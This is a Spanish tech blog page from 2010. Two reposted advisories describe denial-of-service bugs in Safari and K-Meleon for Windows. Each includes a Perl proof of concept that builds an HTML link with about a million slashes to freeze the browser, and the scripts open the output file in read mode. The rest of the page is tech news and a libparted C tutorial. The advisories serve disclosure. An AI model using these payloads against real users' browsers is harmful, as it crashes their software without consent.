04 agosto 2010 Publicado por cLimbo 0 comentarios
############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href="very long URL">click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable


windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable


############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
------------------
thz Lost ;-)
Etiquetas: , , ,

K-Meleon for windows about:neterror Stack Overflow DoS

Publicado por cLimbo 0 comentarios
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
URL creador: http://kmeleon.sourceforge.net/
Reportado por: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Notificación al creador: SÍ Exploit disponible: SÍ
############################################

K-Meleon es un navegador web muy rápido, personalizable y ligero, basado en el motor de renderizado Gecko desarrollado por Mozilla, que es también usado por Firefox. K-Meleon es libre, es software de código abierto distribuido bajo la GNU General Public License y está diseñado específicamente para el OS Microsoft Windows (Win32).

K-Meleon es propenso a algunas vulnerabilidades, entre ellas: a colgarse con una URL muy larga, como about:neterror no limita la cantidad de caracteres que el usuario ponga en los parámetros 'c' 'd' si creamos una url malformada del navegador puede explotarse muy fácil. Esto es explotable a través de enlaces web, como por ejemplo; "haz clic aquí" o mediante window.location.replace url ('muy largo') o vectores similares.

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)


windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)


############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

########################
ASM code stack overflow
########################



################
# PoC
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Casos de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
-------------
thz Lost ;-)

Telefónica compra Tuenti por 70 millones de euros

Publicado por cLimbo 0 comentarios

Telefónica ha comprado el 90% de Tuenti por 70 millones de euros. Mi compañero Miguel se hacía eco de una noticia publicada por el economista en la que aseguraba que Telefónica estaba preparando la compra de la red social, y la pasada noche parece que se ha confirmado. Los 70 millones que la compañía de César Alierta pagará por Tuenti suponen valorar la empresa en un total de 75 millones, y dicho porcentaje se alcanza al adquirir la participación del 30% perteneciente al fondo Qualitas Equity Partners desde hace aproximadamente dos años, además de la parte restante al equipo directivo de Tuenti.

Según las primeras informaciones todo parece indicar que, aunque tenga presencia directa en el Consejo de Administración de Tuenti, Telefónica se mantendrá al margen del desarrollo y la dirección que la red social vaya a tomar en los próximos meses.

Esto no es de extrañar teniendo en cuenta el pasado que Telefónica tiene en cuanto al desarrollo y manejo de redes sociales se refiere. Keteke, su gran apuesta, cerró hace poco más de un año con una difusión y unas estadísticas paupérrimas, y suponemos que ahora se querrán mantener al margen para observar cómo se trabaja en este tipo de ambientes, que son totalmente diferentes a los propios de la operadora de telecomunicaciones.

Según el diario Expansión< , que fue el primero en confirmar la noticia, esto puede ser también un movimiento defensivo por parte de Telefónica para evitar que otro rival y competidor se hiciese con los servicios de la red social para utilizarlo en su contra.

Sea como fuere, lo cierto es que 70 millones para Telefónica suponen tan sólo un 4.22% de los 1.656 millones de euros que ha obtenido como beneficio neto en el primer trimestre de este mismo año, por lo que no se arriesga una cantidad de dinero tan considerable en términos relativos.

A partir del momento que la compra sea aprobada y oficial podremos ir viendo cuál es la actitud que Telefónica adopta y cómo controlan el juguete que tienen en sus manos, que es, sin ninguna duda, muy apetitoso. Se habla de una posible expansión en diversos países de Latinoamérica, y de la casi segura integración en los móviles de la compañía, pero 70 millones dan para pensar en el futuro y en una visión estratégica.

El problema, como muchas otras veces, es que el público que integra estas redes se caracteriza por su movilidad de servicios. El caso de Tuenti todavía puede ser más pronunciado si tenemos en cuenta que de los ocho millones de usuarios activos que tiene en la actualidad, un porcentaje alto está formado por adolescentes y jóvenes por debajo de los 23-25 años.

Éstos son, al fin y al cabo, los más dados a ese tipo de migraciones.

Actualización: Zaryn Dentzel ha publicado un post en el blog oficial de Tuenti en el que confirma el acuerdo con Telefónica, añadiendo además lo siguiente:

La elección de un socio como Telefónica, una empresa de origen español como nosotros, que ya es un actor fundamental en el mercado global. Un socio que entiende que es importante garantizar la continuidad del proyecto y aporta músculo financiero y toda su experiencia en comunicaciones. Además nos permite mantener nuestra visión de producto y el compromiso de todos los que trabajamos en Tuenti con la privacidad de nuestros usuarios.





Vía | Genbeta

1dl.us: Herramientas web "todo en uno"

30 julio 2010 Publicado por cLimbo 0 comentarios

Es inevitable: navegando por Internet, tarde o temprano necesitamos realizar tareas cotidianas como acortar enlaces o compartir imágenes. Hay infinidad de sitios para hacerlo, e incluso podemos cargar un buen número de bookmarklets en la barra de marcadores de nuestro navegador, pero 1dl.us nos ofrece la comodidad de contar con varias utilidades en una sola web.

Su página de inicio ya brinda información sin hacer nada: la IP del equipo, el user-agent del browser y una dirección de correo electrónico desechable que caduca a los 60 minutos de su generación automática. Respecto de esta última, basta con elegir la pestaña Read E-mail para visualizar los mensajes entrantes.

Otras funciones de su interfaz minimalista son una caja de búsqueda en Google, un acortador de enlaces, la posibilidad de alojar imágenes de hasta 7 Mb, un pastebin para almacenar textos o código de programación y una función que comprueba la seguridad de nuestras contraseñas.

No esperen el arsenal de características que existen en los servicios individuales, porque aquí la idea es que sea simple y veloz. Aunque en nuestros equipos podemos tener complementos y atajos que hacen lo mismo o más, es buena idea tenerlo en mente para cuando estamos apurados o utilizamos ordenadores públicos.




Vía | Bitelia

Vuelve el rumor: Es muy posible que Telefónica esté a punto de comprar Tuenti

Publicado por cLimbo 0 comentarios

Telefónica ultima la compra de Tuenti, red social de referencia de los jóvenes españoles y cuya audiencia online supera en nuestro país a la de Facebook, líder mundial de este negocio.

Según ha podido saber, Telefónica y Tuenti llevan conversando desde la pasada primavera, pero ha sido ahora cuando las negociaciones han avanzado de forma sustancial. Tanto es así, que ambas compañías afrontan ahora la recta final de unas negociaciones que podrían cerrarse en los próximos días.

La gestión no se toca

La gestión de Tuenti tampoco se discutirá, ya que tanto Telefónica como la red social para jóvenes tienen claro que el mando de la sociedad seguirá estando en las manos actuales, las mismas que han convertido Tuenti en uno de los mayores fenómenos del Internet en España, por no decir el mayor, tanto en términos de repercusión social, relevancia y audiencia.

El fondo Qualitas Equity Partners es el principal accionista de Tuenti, con el 30% del accionariado, firma de capital riesgo entre cuyos socios se encuentra la familia Polanco, que ya apostó por Tuenti a finales de 2008. En el capital de la red social también participan los principales directivos de la sociedad, entre ellos Zaryn Dentzel, consejero delegado, Bernardo Hernández, su presidente y Félix Ruiz, su vicepresidente.

Las grandes cifras de la red

Diversos analistas del mercado apuntan que la valoración de Tuenti oscilará entre 75 y 80 millones. Entre los grandes activos de la firma es la extraordinaria fidelidad que le prodigan los usuarios de Tuenti a su plataforma. Según fuentes de la empresa, el 60% de los usuarios de Tuenti que se conectan a diario pasan una media de 80 minutos online; más de 20.000 millones de páginas vistas al mes; 86 por ciento de penetración de mercado en la población española; y 51 por ciento mujeres y 49 ciento hombres.




Vía | ElEconomista

YouTube aumenta el límite de tiempo a 15minutos en sus vídeos

Publicado por cLimbo 0 comentarios
Así como quien no quiere la cosa, y sin previo aviso, YouTube acaba de aumentar el límite de tiempo de los videos que se pueden subir a 15 minutos, un 50% más que los 10 minutos que los usuarios “normales” podían cargar hasta ahora.

La razón detrás de este aumento no es la que hubiese sospechado de antemano. No se debe a que cada vez se suben más videos y 10 minutos a veces no alcanzan, sino a que ese límite se debía a una estrategia para evitar que se suba cierto tipo de contenido con copyright (como capítulos de TV o películas).

Pero desde el blog oficial YouTube anuncia que su filtro para este tipo de contenido (Content ID) estuvo recibiendo algunas mejoras, con lo cual el límite puede extenderse un poco más.

Además, para “festejar” este aumento de tiempo, YouTube lanza un concurso adecuadamente titulado “15 minutos de fama”, en el cual los usuarios deben subir un video de –adivinaron– 15 minutos y etiquetarlo con yt15miuntes antes del miércoles 4 de agosto. Los videos elegidos serán mostrados en la página principal de YouTube, lo cual se traduce en una cantidad impresionante de vistas aseguradas.

Yo creo que los límites arbitrarios, por más que al principio puedan chocarnos (sean 10 minutos o 140 caracteres) nos ayudan también a ser más críticos con lo que vamos a subir, elegir lo que realmente queremos transmitir y ajustarnos para no irnos por las ramas. Me pregunto qué efectos tendrá este aumento de tiempo en los videos del portal.




Vía | Bitelia

Etiquetas: , ,

¿Versión en español de FaceBook hackeada?

Publicado por cLimbo 0 comentarios
Incoherencias, términos soeces, frases en otros idiomas, menciones a sitios web… Los usuarios de Facebook en español neutro (generalmente de Latinoamérica), descubrieron anoche que varios sectores de la interfaz mostraban palabras que no debían estar allí, llegando a verse incluso referencias sexuales. La pregunta inmediata, justo en un día donde se filtraron datos de 100 millones de cuentas, fue: ¿hackearon la red social?

Más allá de las modificaciones evidentes, resulta que no hay sistemas comprometidos ni vulnerabilidades que hayan saltado a la luz. Se trata de un grupo turco de hackers que, aparentemente reclamando por el matrimonio entre personas del mismo sexo en su país, burló el sistema de traducción para dejar mensajes.

Recordemos que el mecanismo se basa en la colaboración de los miembros, por lo que cualquiera puede aportar y votar por las mejores traducciones. Pero basta con crear unos cuantos perfiles falsos (alrededor de 200), para hacer creer a la herramienta que se dispone de una frase mejor que la mostrada actualmente.

Los administradores de la aplicación ya están al tanto del problema y trabajan en una solución. Si bien se efectuaron bastantes correcciones, las notificaciones y hasta la leyenda del botón Me gusta eran erróneas al momento de escribir esta entrada. Ocurre que la depuración no es simple, porque depende de los reportes de los usuarios o, en el mejor de los casos, hay que revisar casi 150 mil frases.

Google pasó por algo parecido al inicio del programa Google en tu idioma cuando traductores de habla hispana protestaron porque no recibían pago por esta tarea… editando a propósito la interfaz del buscador. Y también se asemeja a lo que ocurre frecuentemente con Wikipedia y las alteraciones maliciosas de sus artículos.

¿Cómo se evita que vuelva a ocurrir? Aunque el modelo es muy interesante, es necesario un mayor control. Las aproximadamente cinco horas que llevó corregir gran parte de las modificaciones muestran que, aún con reportes de los usuarios, es complejo luchar contra un ataque. ¿Habrá que implementar funcionalidades de reputación o karma para los colaboradores?




Vía | Bitelia

Eliminar mi cuenta definitivamente: una nueva opción que Facebook podría lanzar en breve

28 julio 2010 Publicado por cLimbo 0 comentarios

Hoy en día, darse de baja definitivamente en Facebook puede resultar un proceso complejo y nada rápido. La opción que los usuarios tienen ahora es la de desactivar la cuenta, con lo que tendrán que estar 14 días sin tocar nada de su perfil para que no vuelva a renacer y Facebook se salga con la suya. Pero parece que por fin están incluyendo en los perfiles de algunos usuarios la opción de Eliminar una cuenta permanentemente.

Según algunas capturas que hemos podido encontrar, esta posibilidad permitirá eliminar toda nuestra información en Facebook, incluido todo lo que has compartido, como fotos o vídeos. De todas formas, y como ya es sabido, hay cierta información que Facebook tiene permiso para retener, según sus términos de uso, como por ejemplo nuestra IP o datos relacionados.

Esto, que fue primero un rumor en el día de ayer, fue confirmado por Facebook horas más tarde al decir que “constantemente estamos probando nuevas ideas, incluyendo la colocación de las opciones para los usuarios. Uno de estos recientes tests incluye variaciones de la opción de eliminar cuenta para un porcentaje pequeño de usuarios”.

Así que si estás deseando borrar tu cuenta de Facebook y por ahora no ves esta posibilidad dentro de tu Configuración de cuenta, no te desesperes. Seguro que en los próximos días irán incorporando esta opción en la mayoría de perfiles de la red.



Vía | Genbeta

¿Qué podemos esperar de Chrome 6?

22 julio 2010 Publicado por cLimbo 0 comentarios
Chrome es una delicia en muchos sentidos, pero aún así seguimos esperando ciertas mejoras en futuras versiones. De eso precisamente han hablado en Google recientemente, de lo que podemos esperar con la llegada de Chrome 6.

Resumiendo, hay dos nuevas funciones que muchos agradecerán si andan trabajando con diferentes ordenadores: la sincronización de las extensiones y el historial de forma parecida a como lo hacen ya los favoritos. Además de esto, hay otra característica notable, que es un mejor uso de los procesadores de múltiples núcleos para el manejo y visualización de imágenes de fondo.

Por otro lado, tendremos que esperar algo más para ver otras funciones que se venían comentando, quizás postergadas a la séptima entrega. En este paquete se encuentra el modo de Cliente Nativo para la ejecución de aplicaciones directamente sobre el navegador, así como la visualización de vídeos HTML5 a pantalla completa. Ya veis, algunas noticias buenas y otras menos buenas, pero seguro que estamos deseando probar las nuevas características que sí se han confirmado y que esperamos estén pronto entre nosotros.



Vía | Bitelia

Etiquetas: , , ,

Dell, esto no se le hace a Linux

20 julio 2010 Publicado por cLimbo 0 comentarios

Si hablamos de sistemas operativos de escritorio tengo que decir que soy de los que no se decanta de manera visceral por ninguno de los tres grandes actores del sector, es decir Windows, alguna distribución de Linux o Mac OS X. Utilizo todos ellos de manera bastante asidua y cada uno tiene cosas que me gustan mucho y otras que odio con ganas, de lo que se desprende que los “odio y amo” a partes iguales. Es por esto que no me gusta lo que está haciendo la conocida multinacional estadounidense Dell -esa dedica a desarrollar, fabricar y vender computadoras, servidores y otros productos- con una de las distribuciones de Linux más conocidas y utilizadas del momento, sí, hablo de Ubuntu.

Resulta que Dell desde hace un tiempo viene “jugando a ser el progre” del sector ya que en varias ocasiones han hablado de lo bonito y bueno que es Ubuntu y han emprendido o anunciado diferentes acciones para apoyar el SO. Pero esto es la teoría ya que al final en la práctica o hacen las cosas a medias o directamente en vez de impulsar Ubuntu consiguen justamente lo contrario, y ahora os explico por qué pienso esto.

De primeras tenemos que hace unas semanas Dell afirmaba en su sitio web oficial estadounidense que “Ubuntu es más seguro que Microsoft Windows”, pero al poco tiempo cambiaron la contundente frase por algo más suave: “Ubuntu es seguro”. Hasta aquí más o menos bien, puedo entender el movimiento el cual no perjudica ni favorece a Windows y tampoco a Ubuntu. Lo que ya se me escapa esto es lo que dice Dell de Windows y de Ubuntu para ayudar a sus clientes del Reino Unido a elegir entre uno u otro SO:

Escoja WINDOWS si:

  • Si ya usa programas WINDOWS (e.g., Microsoft Office, iTunes, etc.) y quiere seguir usándolos.
  • Si está familiarizado con WINDOWS y no quiere aprender nuevos programas para correo-e, procesador de palabras, etc.
  • Si es nuevo usando computadoras.

Escoja UBUNTU si:

  • No planea usar Microsoft WINDOWS.
  • Está interesado en la programación open source.

Lo que escribe Dell sobre Ubuntu está para mi completamente “cojo” y da lugar a por un lado malentendidos sobre el SO libre (que está pensado para programadores o algo así por ejemplo), y por el otro lo que dicen de Windows según yo claramente inclina la balanza hacia este último si alguien duda entre uno u otro (la mayoría de clientes potenciales de Dell que por lo que sea se estén planteando cambiar de Windows a Ubuntu vendrán de utilizar Windows y se les está diciendo que si utilizan programas Windows es suficiente para no mudar). Lo correcto hubiera sido poner las lindezas que tiene cada sistema operativo para los usuarios sin inclinar tan descaradamente la balanza hacia una de las partes.

Entiendo que lo más fácil para Dell sería quitarse Ubuntu de encima completamente y listo, pero si decides mojarte, pues hay que hacerlo bien, que al final con estas cosas le hacen más mal que bien a Ubuntu, siguen alimentando las ideas preconcebidas que muchos tienen sobre Linux que hoy en día ya no son ciertas (que es un SO complicado y no apto para “nuevos”)




Vía | ALT1040

Etiquetas: , , ,

PortableLinuxapps: programas portátiles para Linux

Publicado por cLimbo 0 comentarios
La utilidad de las aplicaciones portátiles es indudable: además de poder llevarlas encima para utilizarlas en cualquier ordenador, nos sirven para probar nuevas versiones de programas (como en el caso de Firefox 4 beta) o simplemente probarlos antes de instalarlos.

PortableLinuxapps es un sitio que nos ofrece versiones portátiles de algunos de los programas más populares en el entorno Linux. Para usarlos, ya que todos los archivos que se necesitan están incluidos en el mismo paquete, todo lo que hay que hacer es darles permisos de ejecución y ya está. Si la aplicación no nos interesa, simplemente borramos su archivo.

Al momento de escribir este post, hay 53 aplicaciones de casi todo tipo (y va creciendo), entre ellas algunas de las más conocidas como Blender, Scribus o Audacity. Según dice en la letra pequeña de la web (literal: el pie de página) las aplicaciones han sido probadas en Ubuntu 10.04, OpenSUSE 11.2 y Fedora 12.

He probado algunas en Ubuntu 10.04 y me han funcionado correctamente. Varias de las aplicaciones que hay en la web no son las últimas versiones, cosa a tener en cuenta, y vendría bien una página descriptiva de cada programa, o al menos un pequeño texto más explicativo o un enlace al programa original, aunque la mayoría son bastante conocidos.

También está disponible una aplicación que nos permite crear nuestras propias versiones “todo en 1” de cualquier programa, aunque no sé si seré yo, la aplicación o la posición de los astros, que no he conseguido crear ninguna (seguro que he sido yo). De todas formas, por probarlo que no quede. Si necesitamos ayuda, hay un foro disponible donde buscarla.

En resumen, el sitio está un poco verde aún pero resulta práctico para algunas situaciones, como pruebas o usos ocasionales de ciertos programas que no queremos tener en nuestro ordenador de manera definitiva. Ahora, para llevar programas y usarlos en cualquier parte… Bueno, a menos que todo nuestro entorno esté con este sistema, Linux no abunda tanto como llevar siempre estos programas encima.

Enlace | PortableLinuxapps




Vía | Genbeta

Detenidos tres 'hackers' por atacar las webs del PSM, el PP y el programa 'Sálvame'

14 julio 2010 Publicado por cLimbo 0 comentarios
  • Dos de los arrestados son menores de edad.
  • El grupo desmantelado se hacía llamar en la Red 'KA0 Team'.
  • Accedían a servidores de Internet, aprovechando errores de configuración o de sistema de las mismas, para alterar su contenido.
La Guardia Civil ha detenido a tres hackers, dos de ellos menores de edad, por atacar las páginas web del Partido Socialista de Madrid, del Partido Popular, del programa Sálvame de Telecinco y del Defensor del Menor de la Comunidad de Madrid.

El grupo desmantelado, que se hacía llamar en la Red KA0 Team y que reivindicaba sus ataques con la imagen de un puño rojo, modificaba las páginas originales y, en ocasiones, insultaba a los responsables de las páginas, según ha informado el Cuerpo.

Robo de una base de datos

Uno de los jóvenes había conseguido robar una base de datos con más de ciento veinte mil usuarios de una popular web televisiva, lo que obligó al Grupo de Delitos Telemáticos (GDT) a acelerar la operación Pirulín ante el peligro de que el hacker pusiera a la venta el archivo.

La red fue creada el pasado mes de junio por cuatro jóvenes autodidactas de Valencia, La Coruña, Madrid y León -tres detenidos y un imputado-, conocidos por los nicks de xassiz, kr0no, Ca0s y K41S3R. Nunca llegaron a conocerse personalmente.

Tres de los miembros de la organización han sido detenidos por la Guardia Civil y un cuarto se encuentra imputado por los delitos de daños en sistemas informáticos y descubrimiento y revelación de secretos.

Divulgaban sus hazañas

La banda actuaba mediante la técnica denominada Defacement, que consiste en acceder a servidores de Internet, aprovechando errores de configuración o de sistema de las mismas, para alterar su contenido. La investigación comenzó tras las denuncias interpuestas por los representantes del PP y los administradores de la página web de Sálvame.

Durante su actividad, los jóvenes divulgaban sus hazañas en un conocido portal de Internet utilizado por hackers, donde se atribuían el ataque de veintinueve páginas webs en tan sólo quince días.



Vía | 20minutos

Crea tus plantillas desde cero con Cool Template

13 julio 2010 Publicado por cLimbo 0 comentarios

Cool Template es un servicio gratuito por medio del cual podéis crear plantillas para vuestro blog o página web, aunque también permite exportar las plantillas a HTML con CSS, a Joomla y a ASP.net. El sitio requiere registro, aunque podéis probar sus bondades sin necesidad de hacerlo. Eso sí, no podréis descargar el producto final que obtengáis durante esa prueba.

El sitio utiliza una interfaz en Ajax sumamente fácil de utilizar. Podemos personalizar cosas como el número de barras laterales, la posición y aspecto de la barra de navegación, el aspecto del encabezado, etc. Vamos, prácticamente todos los aspectos de la plantilla, pudiendo subir nuestras propias imágenes como fondo o logo. Dispone de 60 esquemas de color para elegir, aunque podemos crear el nuestro propio.

Los diseños que vayamos creando se quedan almacenados en nuestra cuenta, de manera que podemos recuperarlos y modificarlos usando el mismo editor cuando queramos. Ofrece la opción de crear nuestra propia “exportación”: un conjunto de archivos que se añadirán a la descarga de la plantilla terminada, de manera que podamos personalizar el formato para otro CMS distinto. El sitio incluye un editor de texto para la creación o modificación de estos archivos.

Personalmente, lo veo ideal para aquellos que, sin muchos conocimientos, desean crear su propio tema. O también, y quizá principalmente, para utilizarlo como base para desarrollarlo, ahorrándonos tener que partir de cero. No esperéis hacer virguerías como páginas de entrada con miniaturas o slideshows, pero al menos una plantilla simple personalizada si podréis hacer.

Enlace | Cool Template



Vía | Genbeta

Spotify lanza su cliente para Linux

Publicado por cLimbo 0 comentarios
Spotify acaba de lanzar una versión preliminar de su cliente para sistemas Linux, de modo que el servicio ya puede presumir de estar presente en las tres plataformas más usadas del mercado. De hecho, la misma Spotify ha declarado que un buen número de sus desarrolladores usan Linux.

Spotify para Linux es de momento una versión preliminar sin soporte oficial y tiene las mismas funcionalidades que los clientes de Windows y Mac OS X, aunque por problemas con la decodificación de los archivos musicales en la plataforma libre, esta versión para Linux no puede reproducir archivos de forma local por el momento. Tampoco puede mostrar anuncios, lo cual hace que sólo funcione para usuarios del servicio que tengan una cuenta de pago.

De momento pódéis descargaros esta versión preliminar en forma de paquete para Debian Squeeze o Ubuntu, y los responsables aseguran desde la web oficial que trabajarán duro para equiparar las funciones de esta nueva versión de Linux con las versiones ya existentes para Mac OS X y Windows.

Descarga | Spotify para Linux



Vía | Genbeta
Etiquetas: , ,

Utilizando libparted para obtener información sobre nuestros discos

30 junio 2010 Publicado por cLimbo 0 comentarios

Libparted es una librería desarrollada en C por el proyecto GNU.

Se trata de una librería que nos permite desde listar hasta crear, borrar y modificar particiones. Fue desarrollada para el programa parted, cuya versión gráfica y más conocida es gparted

Para instalar libparted en sistemas basados en debian (como ubuntu):

apt-get install libparted1.8-dev

Una vez instalada, podemos empezar a utilizarla desde nuestros programas, pero antes de entrar en detalle, mejor empezar con un ejemplo:

#include
#include
#define MEGABYTE 1048576

int main (void)
{
PedDevice* device = NULL;
PedDisk* disk = NULL;
PedPartition* part = NULL;
PedGeometry geom;

unsigned long size;
double length;
PedSector p_size;
char *fsname;

ped_device_probe_all ();

while ((device = ped_device_get_next(device))) {
disk = ped_disk_new(device);
p_size = device->length;
size = p_size/MEGABYTE;
size = size * device->sector_size;
printf(“%s name: %s size: %uMB\n”,device->path,device->model,size);

for (part = ped_disk_next_partition (disk, NULL); part;
part = ped_disk_next_partition (disk, part)) {
geom = part->geom;
length = (double)geom.length/MEGABYTE*device->sector_size;
if(part->fs_type) {
fsname = (char*)part->fs_type->name;
} else {
fsname = “Uknown”;
}

//if(part->num > 0) {
printf(“\t%s%d %10.2fMB %s\n”,device->path, part->num,length,fsname);
//}
}

}
return 0;
}

para compilarlo es suficiente poner

gcc -lparted test.c -o test

Al ejecutarlo nos muestra una lista con nuestros discos y sus particiones (debemos ejecutarlo como root ya que libparted utiliza instrucciones a bajo nivel que requieren privilegios de administrador para funcionar)

andr0med:/home/ap0# ./test
/dev/sda name: ATA Hitachi HTS54161 size: 152576MB
/dev/sda1 146389.14MB ext3
/dev/sda2 6236.17MB Uknown
/dev/sda5 6236.14MB linux-swap
andr0med:/home/ap0#

Si miramos el código, vemos que hay dos bucles anidados (uno dentro de otro), el primero es el que lee los discos mientras que el que está dentro se encarga de iterar sobre las particiones de cada disco leído.

Lo primero que tenemos que hacer es incluir la librería

#include

Libparted necesita escanear el sistema busca de dispositivos de almacenamiento, para ello llamamos a ped_device_probe_all:

ped_device_probe_all ();

A continuación, creamos un bucle que itera sobre ped_device_get_next, obteniendo el siguiente dispositivo cada vez que es llamada la función. Cuando no queden mas dispositivos, la función devuelve NULL y el bucle finaliza:

while ((device = ped_device_get_next(device)))

con ped_disk_new(device) a partir de un dispositivo creamos un disco para poder tratarlo como tal

disk = ped_disk_new(device);

con esto obtenemos el tamaño del disco en megabytes

p_size = device->length;
size = p_size/MEGABYTE;
size = size * device->sector_size;

de esta forma ya podemos printear nuestro disco por pantalla con su ruta en el sistema(device->path), modelo(device->model) y su tamaño en MB (size)

printf(“%s name: %s size: %uMB\n”,device->path,device->model,size);

terminado esto, entramos en el segundo bucle el cual hace lo mismo que el primero pero en este caso llamando a las diferentes particiones de nuestro disco

for (part = ped_disk_next_partition (disk, NULL); part;
part = ped_disk_next_partition (disk, part))

Como veis, es un bucle exactamente igual, pero esta vez llamando a ped_disk_next_partition. Calculamos el tamaño de cada partición encontrada en el disco, de la misma forma que hacemos para calcular el tamaño de cada disco:

length = (double)geom.length/MEGABYTE*device->sector_size;

A continuación, comprobamos si la partición tiene un sistema de archivos conocido, en caso contrario lo llamamos Uknown

if(part->fs_type) {
fsname = (char*)part->fs_type->name;
} else {
fsname = “Uknown”;
}

finalmente, printeamos nuestras particiones filtrándolas

if(part->num > 0) {
printf(“\t%s%d %10.2fMB %s\n”,device->path, part->num,length,fsname);
}

Esta condición que comprueba si el número de partición es mayor que 0, es necesaria para impedir que se muestren por pantalla particiones inexistentes por pantalla, ya que ninguna partición está identificada por un número negativo, veamos que pasa si quitamos el condicional:

andr0med:/home/ap0# ./test
/dev/sda name: ATA Hitachi HTS54161 size: 152576MB
/dev/sda-1 0.03MB Uknown
/dev/sda1 146389.14MB ext3
/dev/sda2 6236.17MB Uknown
/dev/sda-1 0.03MB Uknown
/dev/sda5 6236.14MB linux-swap
/dev/sda-1 2.49MB Uknown
andr0med:/home/ap0#

Esto es solo una pequeña parte de lo que se puede hacer con libparted, en un futuro ya volveré a hablar de ella.

Etiquetas: , , , ,